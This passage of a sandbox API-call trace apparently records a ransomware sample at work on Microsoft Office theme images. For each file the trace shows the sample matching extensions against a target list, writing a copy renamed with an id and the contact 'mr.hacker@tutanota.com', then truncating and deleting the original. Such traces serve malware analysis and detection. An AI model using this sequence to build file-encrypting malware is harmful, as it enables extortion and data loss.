lpString2="L.PNG") returned -1 [0046.044] lstrlenW (lpString=".pdf") returned 4 [0046.044] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.044] lstrlenW (lpString=".xls") returned 4 [0046.044] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.044] lstrlenW (lpString=".xlsx") returned 5 [0046.044] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.044] lstrlenW (lpString=".ppt") returned 4 [0046.044] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.044] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0046.044] lstrlenW (lpString=".zip") returned 4 [0046.044] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.044] lstrlenW (lpString=".rar") returned 4 [0046.044] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.044] lstrlenW (lpString=".bz2") returned 4 [0046.044] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.044] lstrlenW (lpString=".7z") returned 3 [0046.044] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.044] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0046.044] lstrlenW (lpString=".dbf") returned 4 [0046.044] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.044] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0046.044] lstrlenW (lpString=".1cd") returned 4 [0046.044] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.044] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0046.044] lstrlenW (lpString=".jpg") returned 4 [0046.044] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.044] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0046.044] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.044] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0046.045] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=26402) returned 1 [0046.045] CloseHandle (hObject=0x210) returned 1 [0046.046] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png")) returned 0x20 [0046.046] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0046.046] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0046.046] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0046.046] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0046.046] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0046.046] GetLastError () returned 0x0 [0046.046] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x6722, lpOverlapped=0x0) returned 1 [0046.049] WriteFile (in: hFile=0x1fc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x6730, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x6730, lpOverlapped=0x0) returned 1 [0046.052] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0046.052] WriteFile (in: hFile=0x1fc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.052] SetEndOfFile (hFile=0x1fc) returned 1 [0046.052] CloseHandle (hObject=0x1fc) returned 1 [0046.052] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0046.052] SetEndOfFile (hFile=0x210) returned 1 [0046.053] CloseHandle (hObject=0x210) returned 1 [0046.053] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0046.053] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png")) returned 1 [0046.053] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0046.053] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0046.053] lstrlenW (lpString=".doc") returned 4 [0046.053] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.054] lstrlenW (lpString=".docx") returned 5 [0046.054] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.054] lstrlenW (lpString=".pdf") returned 4 [0046.054] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.054] lstrlenW (lpString=".xls") returned 4 [0046.054] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.054] lstrlenW (lpString=".xlsx") returned 5 [0046.054] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.054] lstrlenW (lpString=".ppt") returned 4 [0046.054] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.054] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0046.054] lstrlenW (lpString=".zip") returned 4 [0046.054] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.054] lstrlenW (lpString=".rar") returned 4 [0046.054] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.054] lstrlenW (lpString=".bz2") returned 4 [0046.054] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.054] lstrlenW (lpString=".7z") returned 3 [0046.054] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.054] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0046.054] lstrlenW (lpString=".dbf") returned 4 [0046.054] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.054] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0046.054] lstrlenW (lpString=".1cd") returned 4 [0046.054] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.054] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0046.054] lstrlenW (lpString=".jpg") returned 4 [0046.054] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.054] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0046.054] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0046.054] lstrlenW (lpString=".doc") returned 4 [0046.054] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.054] lstrlenW (lpString=".docx") returned 5 [0046.054] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.055] lstrlenW (lpString=".pdf") returned 4 [0046.055] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.055] lstrlenW (lpString=".xls") returned 4 [0046.055] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.055] lstrlenW (lpString=".xlsx") returned 5 [0046.055] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.055] lstrlenW (lpString=".ppt") returned 4 [0046.055] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.055] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0046.055] lstrlenW (lpString=".zip") returned 4 [0046.055] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.055] lstrlenW (lpString=".rar") returned 4 [0046.055] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.055] lstrlenW (lpString=".bz2") returned 4 [0046.055] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.055] lstrlenW (lpString=".7z") returned 3 [0046.055] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.055] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0046.055] lstrlenW (lpString=".dbf") returned 4 [0046.055] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.055] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0046.055] lstrlenW (lpString=".1cd") returned 4 [0046.055] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.055] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0046.055] lstrlenW (lpString=".jpg") returned 4 [0046.055] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.055] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0046.055] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.055] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0046.056] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=1354) returned 1 [0046.056] CloseHandle (hObject=0x210) returned 1 [0046.056] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif")) returned 0x20 [0046.056] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0046.056] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0046.056] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0046.056] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0046.056] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0046.559] GetLastError () returned 0x0 [0046.559] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x54a, lpOverlapped=0x0) returned 1 [0046.561] WriteFile (in: hFile=0x200, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x550, lpOverlapped=0x0) returned 1 [0046.562] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0046.562] WriteFile (in: hFile=0x200, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.562] SetEndOfFile (hFile=0x200) returned 1 [0046.562] CloseHandle (hObject=0x200) returned 1 [0046.562] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0046.562] SetEndOfFile (hFile=0x210) returned 1 [0046.563] CloseHandle (hObject=0x210) returned 1 [0046.563] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0046.563] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif")) returned 1 [0046.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0046.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0046.563] lstrlenW (lpString=".doc") returned 4 [0046.563] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.564] lstrlenW (lpString=".docx") returned 5 [0046.564] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.564] lstrlenW (lpString=".pdf") returned 4 [0046.564] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.564] lstrlenW (lpString=".xls") returned 4 [0046.564] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.564] lstrlenW (lpString=".xlsx") returned 5 [0046.564] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.564] lstrlenW (lpString=".ppt") returned 4 [0046.564] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.564] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0046.564] lstrlenW (lpString=".zip") returned 4 [0046.564] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.564] lstrlenW (lpString=".rar") returned 4 [0046.564] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.564] lstrlenW (lpString=".bz2") returned 4 [0046.564] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.564] lstrlenW (lpString=".7z") returned 3 [0046.564] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.564] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0046.564] lstrlenW (lpString=".dbf") returned 4 [0046.564] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.564] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0046.564] lstrlenW (lpString=".1cd") returned 4 [0046.564] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.564] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0046.564] lstrlenW (lpString=".jpg") returned 4 [0046.564] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.564] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0046.564] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0046.564] lstrlenW (lpString=".doc") returned 4 [0046.564] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.564] lstrlenW (lpString=".docx") returned 5 [0046.564] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.564] lstrlenW (lpString=".pdf") returned 4 [0046.565] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.565] lstrlenW (lpString=".xls") returned 4 [0046.565] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.565] lstrlenW (lpString=".xlsx") returned 5 [0046.565] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.565] lstrlenW (lpString=".ppt") returned 4 [0046.565] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.565] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0046.565] lstrlenW (lpString=".zip") returned 4 [0046.565] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.565] lstrlenW (lpString=".rar") returned 4 [0046.565] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.565] lstrlenW (lpString=".bz2") returned 4 [0046.565] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.565] lstrlenW (lpString=".7z") returned 3 [0046.565] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.565] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0046.565] lstrlenW (lpString=".dbf") returned 4 [0046.565] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.565] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0046.565] lstrlenW (lpString=".1cd") returned 4 [0046.565] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.565] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0046.565] lstrlenW (lpString=".jpg") returned 4 [0046.565] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.565] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0046.566] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.566] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0047.113] GetFileSizeEx (in: hFile=0x1ec, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=44850) returned 1 [0047.113] CloseHandle (hObject=0x1ec) returned 1 [0047.113] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png")) returned 0x20 [0047.113] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0047.113] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0047.113] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.113] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.113] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0047.114] GetLastError () returned 0x0 [0047.114] ReadFile (in: hFile=0x1ec, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0xaf32, lpOverlapped=0x0) returned 1 [0047.116] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xaf40, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xaf40, lpOverlapped=0x0) returned 1 [0047.118] ReadFile (in: hFile=0x1ec, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0047.118] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.118] SetEndOfFile (hFile=0x160) returned 1 [0047.118] CloseHandle (hObject=0x160) returned 1 [0047.119] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.119] SetEndOfFile (hFile=0x1ec) returned 1 [0047.119] CloseHandle (hObject=0x1ec) returned 1 [0047.120] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0047.120] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png")) returned 1 [0047.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0047.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0047.120] lstrlenW (lpString=".doc") returned 4 [0047.120] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.120] lstrlenW (lpString=".docx") returned 5 [0047.120] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.120] lstrlenW (lpString=".pdf") returned 4 [0047.120] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.120] lstrlenW (lpString=".xls") returned 4 [0047.120] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.120] lstrlenW (lpString=".xlsx") returned 5 [0047.120] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.120] lstrlenW (lpString=".ppt") returned 4 [0047.120] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0047.120] lstrlenW (lpString=".zip") returned 4 [0047.120] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.120] lstrlenW (lpString=".rar") returned 4 [0047.120] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.121] lstrlenW (lpString=".bz2") returned 4 [0047.121] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.121] lstrlenW (lpString=".7z") returned 3 [0047.121] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0047.121] lstrlenW (lpString=".dbf") returned 4 [0047.121] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0047.121] lstrlenW (lpString=".1cd") returned 4 [0047.121] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0047.121] lstrlenW (lpString=".jpg") returned 4 [0047.121] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0047.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0047.121] lstrlenW (lpString=".doc") returned 4 [0047.121] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.121] 